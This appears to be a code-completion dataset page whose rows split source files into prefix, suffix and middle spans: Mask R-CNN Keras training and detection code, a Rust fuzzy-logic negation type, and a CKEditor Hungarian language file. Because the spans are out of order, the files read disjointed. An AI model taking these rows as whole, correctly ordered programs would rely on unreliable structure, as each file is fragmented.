layers = filter(lambda l: l.name not in exclude, layers)
if by_name:
hdf5_format.load_weights_from_hdf5_group_by_name(f, layers)
else:
hdf5_format.load_weights_from_hdf5_group(f, layers)
# Update the log directory
self.set_log_dir(filepath)
def get_imagenet_weights(self):
"""Downloads ImageNet trained weights from Keras.
Returns path to weights file.
"""
from keras.utils.data_utils import get_file
TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/'\
'releases/download/v0.2/'\
'resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5'
weights_path = get_file('resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5',
TF_WEIGHTS_PATH_NO_TOP,
cache_subdir='models',
md5_hash='a268eb855778b3df3c7506639542a6af')
return weights_path
def compile(self, learning_rate, momentum):
"""Gets the model ready for training. Adds losses, regularization, and
metrics. Then calls the Keras compile() function.
"""
# Optimizer object
optimizer = keras.optimizers.SGD(
lr=learning_rate, momentum=momentum,
clipnorm=self.config.GRADIENT_CLIP_NORM)
# Add Losses
# First, clear previously set losses to avoid duplication
self.keras_model._losses = []
self.keras_model._per_input_losses = {}
loss_names = [
"rpn_class_loss", "rpn_bbox_loss",
"mrcnn_class_loss", "mrcnn_bbox_loss", "mrcnn_mask_loss"]
for name in loss_names:
layer = self.keras_model.get_layer(name)
if layer.output in self.keras_model.losses:
continue
loss = (
tf.reduce_mean(layer.output, keepdims=True)
* self.config.LOSS_WEIGHTS.get(name, 1.))
self.keras_model.add_loss(loss)
# Add L2 Regularization
# Skip gamma and beta weights of batch normalization layers.
reg_losses = [
keras.regularizers.l2(self.config.WEIGHT_DECAY)(w) / tf.cast(tf.size(w), tf.float32)
for w in self.keras_model.trainable_weights
if 'gamma' not in w.name and 'beta' not in w.name]
self.keras_model.add_loss(tf.add_n(reg_losses))
# Compile
self.keras_model.compile(
optimizer=optimizer,
loss=[None] * len(self.keras_model.outputs))
# Add metrics for losses
for name in loss_names:
if name in self.keras_model.metrics_names:
continue
layer = self.keras_model.get_layer(name)
self.keras_model.metrics_names.append(name)
loss = (
tf.reduce_mean(layer.output, keepdims=True)
* self.config.LOSS_WEIGHTS.get(name, 1.))
self.keras_model.add_metric(loss, name, aggregation='mean')
def set_trainable(self, layer_regex, keras_model=None, indent=0, verbose=1):
"""Sets model layers as trainable if their names match
the given regular expression.
"""
# Print message on the first call (but not on recursive calls)
if verbose > 0 and keras_model is None:
log("Selecting layers to train")
keras_model = keras_model or self.keras_model
# In multi-GPU training, we wrap the model. Get layers
# of the inner model because they have the weights.
layers = keras_model.inner_model.layers if hasattr(keras_model, "inner_model")\
else keras_model.layers
for layer in layers:
# Is the layer a model?
if layer.__class__.__name__ == 'Model':
print("In model: ", layer.name)
self.set_trainable(
layer_regex, keras_model=layer, indent=indent + 4)
continue
if not layer.weights:
continue
# Is it trainable?
trainable = bool(re.fullmatch(layer_regex, layer.name))
# Update layer. If layer is a container, update inner layer.
if layer.__class__.__name__ == 'TimeDistributed':
layer.layer.trainable = trainable
else:
layer.trainable = trainable
# Print trainable layer names
if trainable and verbose > 0:
log("{}{:20} ({})".format(" " * indent, layer.name,
layer.__class__.__name__))
def set_log_dir(self, model_path=None):
"""Sets the model log directory and epoch counter.
model_path: If None, or a format different from what this code uses
then set a new log directory and start epochs from 0. Otherwise,
extract the log directory and the epoch counter from the file
name.
"""
# Set date and epoch counter as if starting a new model
self.epoch = 0
now = datetime.datetime.now()
# If we have a model path with date and epochs use them
if model_path:
# Continue from we left of. Get epoch and date from the file name
# A sample model path might look like:
# \path\to\logs\coco20171029T2315\mask_rcnn_coco_0001.h5 (Windows)
# /path/to/logs/coco20171029T2315/mask_rcnn_coco_0001.h5 (Linux)
regex = r".*[/\\][\w-]+(\d{4})(\d{2})(\d{2})T(\d{2})(\d{2})[/\\]mask\_rcnn\_[\w-]+(\d{4})\.h5"
# Use string for regex since we might want to use pathlib.Path as model_path
m = re.match(regex, str(model_path))
if m:
now = datetime.datetime(int(m.group(1)), int(m.group(2)), int(m.group(3)),
int(m.group(4)), int(m.group(5)))
# Epoch number in file is 1-based, and in Keras code it's 0-based.
# So, adjust for that then increment by one to start from the next epoch
self.epoch = int(m.group(6)) - 1 + 1
print('Re-starting from epoch %d' % self.epoch)
# Directory for training logs
self.log_dir = os.path.join(self.model_dir, "{}{:%Y%m%dT%H%M}".format(
self.config.NAME.lower(), now))
# Path to save after each epoch. Include placeholders that get filled by Keras.
self.checkpoint_path = os.path.join(self.log_dir, "mask_rcnn_{}_*epoch*.h5".format(
self.config.NAME.lower()))
self.checkpoint_path = self.checkpoint_path.replace(
"*epoch*", "{epoch:04d}")
def train(self, train_dataset, val_dataset, learning_rate, epochs, layers,
augmentation=None, custom_callbacks=None):
"""Train the model.
train_dataset, val_dataset: Training and validation Dataset objects.
learning_rate: The learning rate to train with
epochs: Number of training epochs. Note that previous training epochs
are considered to be done alreay, so this actually determines
the epochs to train in total rather than in this particaular
call.
layers: Allows selecting wich layers to train. It can be:
- A regular expression to match layer names to train
- One of these predefined values:
heads: The RPN, classifier and mask heads of the network
all: All the layers
3+: Train Resnet stage 3 and up
4+: Train Resnet stage 4 and up
5+: Train Resnet stage 5 and up
augmentation: Optional. An imgaug (https://github.com/aleju/imgaug)
augmentation. For example, passing imgaug.augmenters.Fliplr(0.5)
flips images right/left 50% of the time. You can pass complex
augmentations as well. This augmentation applies 50% of the
time, and when it does it flips images right/left half the time
and adds a Gaussian blur with a random sigma in range 0 to 5.
augmentation = imgaug.augmenters.Sometimes(0.5, [
imgaug.augmenters.Fliplr(0.5),
imgaug.augmenters.GaussianBlur(sigma=(0.0, 5.0))
])
custom_callbacks: Optional. Add custom callbacks to be called
with the keras fit_generator method. Must be list of type keras.callbacks.
"""
assert self.mode == "training", "Create model in training mode."
# Pre-defined layer regular expressions
layer_regex = {
# all layers but the backbone
"heads": r"(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)",
# From a specific Resnet stage and up
"3+": r"(res3.*)|(bn3.*)|(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)",
"4+": r"(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)",
"5+": r"(res5.*)|(bn5.*)|(mrcnn\_.*)|(rpn\_.*)|(fpn\_.*)",
# All layers
"all": ".*",
}
if layers in layer_regex.keys():
layers = layer_regex[layers]
# Data generators
train_generator = DataGenerator(train_dataset, self.config, shuffle=True,
augmentation=augmentation,
batch_size=self.config.BATCH_SIZE)
val_generator = DataGenerator(val_dataset, self.config, shuffle=True,
batch_size=self.config.BATCH_SIZE)
# Create log_dir if it does not exist
if not os.path.exists(self.log_dir):
os.makedirs(self.log_dir)
# Callbacks
callbacks = [
keras.callbacks.TensorBoard(log_dir=self.log_dir,
histogram_freq=0, write_graph=True, write_images=False),
keras.callbacks.ModelCheckpoint(self.checkpoint_path,
verbose=0, save_weights_only=True),
]
# Add custom callbacks to the list
if custom_callbacks:
callbacks += custom_callbacks
# Train
log("\nStarting at epoch {}. LR={}\n".format(self.epoch, learning_rate))
log("Checkpoint Path: {}".format(self.checkpoint_path))
self.set_trainable(layers)
self.compile(learning_rate, self.config.LEARNING_MOMENTUM)
# Work-around for Windows: Keras fails on Windows when using
# multiprocessing workers. See discussion here:
# https://github.com/matterport/Mask_RCNN/issues/13#issuecomment-353124009
if os.name == 'nt':
workers = 0
else:
workers = multiprocessing.cpu_count()
self.keras_model.fit(
train_generator,
initial_epoch=self.epoch,
epochs=epochs,
steps_per_epoch=self.config.STEPS_PER_EPOCH,
callbacks=callbacks,
validation_data=val_generator,
validation_steps=self.config.VALIDATION_STEPS,
max_queue_size=100,
workers=workers,
use_multiprocessing=(1 < workers),
)
self.epoch = max(self.epoch, epochs)
def mold_inputs(self, images):
"""Takes a list of images and modifies them to the format expected
as an input to the neural network.
images: List of image matrices [height,width,depth]. Images can have
different sizes.
Returns 3 Numpy matrices:
molded_images: [N, h, w, 3]. Images resized and normalized.
image_metas: [N, length of meta data]. Details about each image.
windows: [N, (y1, x1, y2, x2)]. The portion of the image that has the
original image (padding excluded).
"""
molded_images = []
image_metas = []
windows = []
for image in images:
# Resize image
# TODO: move resizing to mold_image()
molded_image, window, scale, padding, crop = utils.resize_image(
image,
min_dim=self.config.IMAGE_MIN_DIM,
min_scale=self.config.IMAGE_MIN_SCALE,
max_dim=self.config.IMAGE_MAX_DIM,
mode=self.config.IMAGE_RESIZE_MODE)
molded_image = mold_image(molded_image, self.config)
# Build image_meta
image_meta = compose_image_meta(
0, image.shape, molded_image.shape, window, scale,
np.zeros([self.config.NUM_CLASSES], dtype=np.int32))
# Append
molded_images.append(molded_image)
windows.append(window)
image_metas.append(image_meta)
# Pack into arrays
molded_images = np.stack(molded_images)
image_metas = np.stack(image_metas)
windows = np.stack(windows)
return molded_images, image_metas, windows
def unmold_detections(self, detections, mrcnn_mask, original_image_shape,
image_shape, window):
"""Reformats the detections of one image from the format of the neural
network output to a format suitable for use in the rest of the
application.
detections: [N, (y1, x1, y2, x2, class_id, score)] in normalized coordinates
mrcnn_mask: [N, height, width, num_classes]
original_image_shape: [H, W, C] Original image shape before resizing
image_shape: [H, W, C] Shape of the image after resizing and padding
window: [y1, x1, y2, x2] Pixel coordinates of box in the image where the real
image is excluding the padding.
Returns:
boxes: [N, (y1, x1, y2, x2)] Bounding boxes in pixels
class_ids: [N] Integer class IDs for each bounding box
scores: [N] Float probability scores of the class_id
masks: [height, width, num_instances] Instance masks
"""
# How many detections do we have?
# Detections array is padded with zeros. Find the first class_id == 0.
zero_ix = np.where(detections[:, 4] == 0)[0]
N = zero_ix[0] if zero_ix.shape[0] > 0 else detections.shape[0]
# Extract boxes, class_ids, scores, and class-specific masks
boxes = detections[:N, :4]
class_ids = detections[:N, 4].astype(np.int32)
scores = detections[:N, 5]
masks = mrcnn_mask[np.arange(N), :, :, class_ids]
# Translate normalized coordinates in the resized image to pixel
# coordinates in the original image before resizing
window = utils.norm_boxes(window, image_shape[:2])
wy1, wx1, wy2, wx2 = window
shift = np.array([wy1, wx1, wy1, wx1])
wh = wy2 - wy1 # window height
ww = wx2 - wx1 # window width
scale = np.array([wh, ww, wh, ww])
# Convert boxes to normalized coordinates on the window
boxes = np.divide(boxes - shift, scale)
# Convert boxes to pixel coordinates on the original image
boxes = utils.denorm_boxes(boxes, original_image_shape[:2])
# Filter out detections with zero area. Happens in early training when
# network weights are still random
exclude_ix = np.where(
(boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) <= 0)[0]
if exclude_ix.shape[0] > 0:
boxes = np.delete(boxes, exclude_ix, axis=0)
class_ids = np.delete(class_ids, exclude_ix, axis=0)
scores = np.delete(scores, exclude_ix, axis=0)
masks = np.delete(masks, exclude_ix, axis=0)
N = class_ids.shape[0]
# Resize masks to original image size and set boundary threshold.
full_masks = []
for i in range(N):
# Convert neural network mask to full size mask
full_mask = utils.unmold_mask(masks[i], boxes[i], original_image_shape)
full_masks.append(full_mask)
full_masks = np.stack(full_masks, axis=-1)\
if full_masks else np.empty(original_image_shape[:2] + (0,))
return boxes, class_ids, scores, full_masks
def detect(self, images, verbose=0):
"""Runs the detection pipeline.
images: List of images, potentially of different sizes.
Returns a list of dicts, one dict per image. The dict contains:
rois: [N, (y1, x1, y2, x2)] detection bounding boxes
class_ids: [N] int class IDs
scores: [N] float probability scores for the class IDs
masks: [H, W, N] instance binary masks
"""
assert self.mode == "inference", "Create model in inference mode."
assert len(
images) == self.config.BATCH_SIZE, "len(images) must be equal to BATCH_SIZE"
if verbose:
log("Processing {} images".format(len(images)))
for image in images:
log("image", image)
# Mold inputs to format expected by the neural network
molded_images, image_metas, windows = self.mold_inputs(images)
# Validate image sizes
# All images in a batch MUST be of the same size
image_shape = molded_images[0].shape
for g in molded_images[1:]:
assert g.shape == image_shape,\
"After resizing, all images must have the same size. Check IMAGE_RESIZE_MODE and image sizes."
# Anchors
anchors = self.get_anchors(image_shape)
# Duplicate across the batch dimension because Keras requires it
# TODO: can this be optimized to avoid duplicating the anchors?
anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape)
if verbose:
log("molded_images", molded_images)
log("image_metas", image_metas)
log("anchors", anchors)
# Run object detection
detections, _, _, mrcnn_mask, _, _, _ =\
self.keras_model.predict([molded_images, image_metas, anchors], verbose=0)
# Process detections
results = []
for i, image in enumerate(images):
final_rois, final_class_ids, final_scores, final_masks =\
self.unmold_detections(detections[i], mrcnn_mask[i],
image.shape, molded_images[i].shape,
windows[i])
results.append({
"rois": final_rois,
"class_ids": final_class_ids,
"scores": final_scores,
"masks": final_masks,
})
return results
def detect_molded(self, molded_images, image_metas, verbose=0):
"""Runs the detection pipeline, but expect inputs that are
molded already. Used mostly for debugging and inspecting
the model.
molded_images: List of images loaded using load_image_gt()
image_metas: image meta data, also returned by load_image_gt()
Returns a list of dicts, one dict per image. The dict contains:
rois: [N, (y1, x1, y2, x2)] detection bounding boxes
class_ids: [N] int class IDs
scores: [N] float probability scores for the class IDs
masks: [H, W, N] instance binary masks
"""
assert self.mode == "inference", "Create model in inference mode."
assert len(molded_images) == self.config.BATCH_SIZE,\
"Number of images must be equal to BATCH_SIZE"
if verbose:
log("Processing {} images".format(len(molded_images)))
for image in molded_images:
log("image", image)
# Validate image sizes
# All images in a batch MUST be of the same size
image_shape = molded_images[0].shape
for g in molded_images[1:]:
assert g.shape == image_shape, "Images must have the same size"
| anchors = self.get_anchors(image_shape)
# Duplicate across the batch dimension because Keras requires it
# TODO: can this be optimized to avoid duplicating the anchors?
anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape)
if verbose:
log("molded_images", molded_images)
log("image_metas", image_metas)
log("anchors", anchors)
# Run object detection
detections, _, _, mrcnn_mask, _, _, _ =\
self.keras_model.predict([molded_images, image_metas, anchors], verbose=0)
# Process detections
results = []
for i, image in enumerate(molded_images):
window = [0, 0, image.shape[0], image.shape[1]]
final_rois, final_class_ids, final_scores, final_masks =\
self.unmold_detections(detections[i], mrcnn_mask[i],
image.shape, molded_images[i].shape,
window)
results.append({
"rois": final_rois,
"class_ids": final_class_ids,
"scores": final_scores,
"masks": final_masks,
})
return results
def get_anchors(self, image_shape):
"""Returns anchor pyramid for the given image size."""
backbone_shapes = compute_backbone_shapes(self.config, image_shape)
# Cache anchors and reuse if image shape is the same
if not hasattr(self, "_anchor_cache"):
self._anchor_cache = {}
if not tuple(image_shape) in self._anchor_cache:
# Generate Anchors
a = utils.generate_pyramid_anchors(
self.config.RPN_ANCHOR_SCALES,
self.config.RPN_ANCHOR_RATIOS,
backbone_shapes,
self.config.BACKBONE_STRIDES,
self.config.RPN_ANCHOR_STRIDE)
# Keep a copy of the latest anchors in pixel coordinates because
# it's used in inspect_model notebooks.
# TODO: Remove this after the notebook are refactored to not use it
self.anchors = a
# Normalize coordinates
self._anchor_cache[tuple(image_shape)] = utils.norm_boxes(a, image_shape[:2])
return self._anchor_cache[tuple(image_shape)]
def ancestor(self, tensor, name, checked=None):
"""Finds the ancestor of a TF tensor in the computation graph.
tensor: TensorFlow symbolic tensor.
name: Name of ancestor tensor to find
checked: For internal use. A list of tensors that were already
searched to avoid loops in traversing the graph.
"""
checked = checked if checked is not None else []
# Put a limit on how deep we go to avoid very long loops
if len(checked) > 500:
return None
# Convert name to a regex and allow matching a number prefix
# because Keras adds them automatically
if isinstance(name, str):
name = re.compile(name.replace("/", r"(\_\d+)*/"))
parents = tensor.op.inputs
for p in parents:
if p in checked:
continue
if bool(re.fullmatch(name, p.name)):
return p
checked.append(p)
a = self.ancestor(p, name, checked)
if a is not None:
return a
return None
def find_trainable_layer(self, layer):
"""If a layer is encapsulated by another layer, this function
digs through the encapsulation and returns the layer that holds
the weights.
"""
if layer.__class__.__name__ == 'TimeDistributed':
return self.find_trainable_layer(layer.layer)
return layer
def get_trainable_layers(self):
"""Returns a list of layers that have weights."""
layers = []
# Loop through all layers
for l in self.keras_model.layers:
# If layer is a wrapper, find inner trainable layer
l = self.find_trainable_layer(l)
# Include layer if it has weights
if l.get_weights():
layers.append(l)
return layers
def run_graph(self, images, outputs, image_metas=None):
"""Runs a sub-set of the computation graph that computes the given
outputs.
image_metas: If provided, the images are assumed to be already
molded (i.e. resized, padded, and normalized)
outputs: List of tuples (name, tensor) to compute. The tensors are
symbolic TensorFlow tensors and the names are for easy tracking.
Returns an ordered dict of results. Keys are the names received in the
input and values are Numpy arrays.
"""
model = self.keras_model
# Organize desired outputs into an ordered dict
outputs = OrderedDict(outputs)
for o in outputs.values():
assert o is not None
# Build a Keras function to run parts of the computation graph
inputs = model.inputs
if model.uses_learning_phase and not isinstance(K.learning_phase(), int):
inputs += [K.learning_phase()]
kf = K.function(model.inputs, list(outputs.values()))
# Prepare inputs
if image_metas is None:
molded_images, image_metas, _ = self.mold_inputs(images)
else:
molded_images = images
image_shape = molded_images[0].shape
# Anchors
anchors = self.get_anchors(image_shape)
# Duplicate across the batch dimension because Keras requires it
# TODO: can this be optimized to avoid duplicating the anchors?
anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape)
model_in = [molded_images, image_metas, anchors]
# Run inference
if model.uses_learning_phase and not isinstance(K.learning_phase(), int):
model_in.append(0.)
outputs_np = kf(model_in)
# Pack the generated Numpy arrays into a a dict and log the results.
outputs_np = OrderedDict([(k, v)
for k, v in zip(outputs.keys(), outputs_np)])
for k, v in outputs_np.items():
log(k, v)
return outputs_np
############################################################
# Data Formatting
############################################################
def compose_image_meta(image_id, original_image_shape, image_shape,
window, scale, active_class_ids):
"""Takes attributes of an image and puts them in one 1D array.
image_id: An int ID of the image. Useful for debugging.
original_image_shape: [H, W, C] before resizing or padding.
image_shape: [H, W, C] after resizing and padding
window: (y1, x1, y2, x2) in pixels. The area of the image where the real
image is (excluding the padding)
scale: The scaling factor applied to the original image (float32)
active_class_ids: List of class_ids available in the dataset from which
the image came. Useful if training on images from multiple datasets
where not all classes are present in all datasets.
"""
meta = np.array(
[image_id] + # size=1
list(original_image_shape) + # size=3
list(image_shape) + # size=3
list(window) + # size=4 (y1, x1, y2, x2) in image cooredinates
[scale] + # size=1
list(active_class_ids) # size=num_classes
)
return meta
def parse_image_meta(meta):
"""Parses an array that contains image attributes to its components.
See compose_image_meta() for more details.
meta: [batch, meta length] where meta length depends on NUM_CLASSES
Returns a dict of the parsed values.
"""
image_id = meta[:, 0]
original_image_shape = meta[:, 1:4]
image_shape = meta[:, 4:7]
window = meta[:, 7:11] # (y1, x1, y2, x2) window of image in in pixels
scale = meta[:, 11]
active_class_ids = meta[:, 12:]
return {
"image_id": image_id.astype(np.int32),
"original_image_shape": original_image_shape.astype(np.int32),
"image_shape": image_shape.astype(np.int32),
"window": window.astype(np.int32),
"scale": scale.astype(np.float32),
"active_class_ids": active_class_ids.astype(np.int32),
}
def parse_image_meta_graph(meta):
"""Parses a tensor that contains image attributes to its components.
See compose_image_meta() for more details.
meta: [batch, meta length] where meta length depends on NUM_CLASSES
Returns a dict of the parsed tensors.
"""
image_id = meta[:, 0]
original_image_shape = meta[:, 1:4]
image_shape = meta[:, 4:7]
window = meta[:, 7:11] # (y1, x1, y2, x2) window of image in in pixels
scale = meta[:, 11]
active_class_ids = meta[:, 12:]
return {
"image_id": image_id,
"original_image_shape": original_image_shape,
"image_shape": image_shape,
"window": window,
"scale": scale,
"active_class_ids": active_class_ids,
}
def mold_image(images, config):
"""Expects an RGB image (or array of images) and subtracts
the mean pixel and converts it to float. Expects image
colors in RGB order.
"""
return images.astype(np.float32) - config.MEAN_PIXEL
def unmold_image(normalized_images, config):
"""Takes a image normalized with mold() and returns the original."""
return (normalized_images + config.MEAN_PIXEL).astype(np.uint8)
############################################################
# Miscellenous Graph Functions
############################################################
def trim_zeros_graph(boxes, name='trim_zeros'):
"""Often boxes are represented with matrices of shape [N, 4] and
are padded with zeros. This removes zero boxes.
boxes: [N, 4] matrix of boxes.
non_zeros: [N] a 1D boolean mask identifying the rows to keep
"""
non_zeros = tf.cast(tf.reduce_sum(tf.abs(boxes), axis=1), tf.bool)
boxes = tf.boolean_mask(boxes, non_zeros, name=name)
return boxes, non_zeros
def batch_pack_graph(x, counts, num_rows):
"""Picks different number of values from each row
in x depending on the values in counts.
"""
outputs = []
for i in range(num_rows):
outputs.append(x[i, :counts[i]])
return tf.concat(outputs, axis=0)
def norm_boxes_graph(boxes, shape):
"""Converts boxes from pixel coordinates to normalized coordinates.
boxes: [..., (y1, x1, y2, x2)] in pixel coordinates
shape: [..., (height, width)] in pixels
Note: In pixel coordinates (y2, x2) is outside the box. But in normalized
coordinates it's inside the box.
Returns:
[..., (y1, x1, y2, x2)] in normalized coordinates
"""
h, w = tf.split(tf.cast(shape, tf.float32), 2)
scale = tf.concat([h, w, h, w], axis=-1) - tf.constant(1.0)
shift = tf.constant([0., 0., 1., 1.])
return tf.divide(boxes - shift, scale)
def denorm_boxes_graph(boxes, shape):
"""Converts boxes from normalized coordinates to pixel coordinates.
boxes: [..., (y1, x1, y2, x2)] in normalized coordinates
shape: [..., (height, width)] in pixels
Note: In pixel coordinates (y2, x2) is outside the box. But in normalized
coordinates it's inside the box.
Returns:
[..., (y1, x1, y2, x2)] in pixel coordinates
"""
h, w = tf.split(tf.cast(shape, tf.float32), 2)
scale = tf.concat([h, w, h, w], axis=-1) - tf.constant(1.0)
shift = tf.constant([0., 0., 1., 1.])
return tf.cast(tf.round(tf.multiply(boxes, scale) + shift), tf.int32) | # Anchors |
not.rs | use std::fmt::{Debug, Display, Formatter, Result as FmtResult};
use std::marker::PhantomData;
use super::Expr;
| use crate::impl_fuzzy_expr_ops;
/// Fuzzy "and" expression.
pub struct ExprNot<S, V> {
val: V,
phantom: PhantomData<S>
}
impl<S, V> ExprNot<S, V> {
pub fn new(val: V) -> Self {
Self {
val,
phantom: PhantomData
}
}
}
impl<S, V> Clone for ExprNot<S, V>
where
V: Clone
{
fn clone(&self) -> Self {
Self::new(self.val.clone())
}
}
impl<S, V> Copy for ExprNot<S, V>
where
V: Copy
{}
impl<S, V: Debug> Debug for ExprNot<S, V> {
fn fmt(&self, f: &mut Formatter) -> FmtResult {
write!(f, "ExprNot({:?})", self.val)
}
}
impl<S, V: Display> Display for ExprNot<S, V> {
fn fmt(&self, f: &mut Formatter) -> FmtResult {
write!(f, "!{}", self.val)
}
}
impl<S, V> Expr<S> for ExprNot<S, V>
where
S: Opset,
V: Expr<S>
{
#[inline]
fn to_value(&self) -> Membership<S> {
!self.val.to_value()
}
}
impl_fuzzy_expr_ops! {
ExprNot<S, V>
} | use crate::opset::Opset;
use crate::value::Membership; |
hu.js | /*
Copyright (c) 2003-2012, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/
CKEDITOR.plugins.setLang( 'about', 'hu', {
copy: 'Copyright © $1. Minden jog fenntartva.',
dlgTitle: 'CKEditor névjegy',
help: 'Itt találsz segítséget: $1',
moreInfo: 'Licenszelési információkért kérjük látogassa meg weboldalunkat:',
title: 'CKEditor névjegy', | }); | userGuide: 'CKEditor Felhasználói útmutató' |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.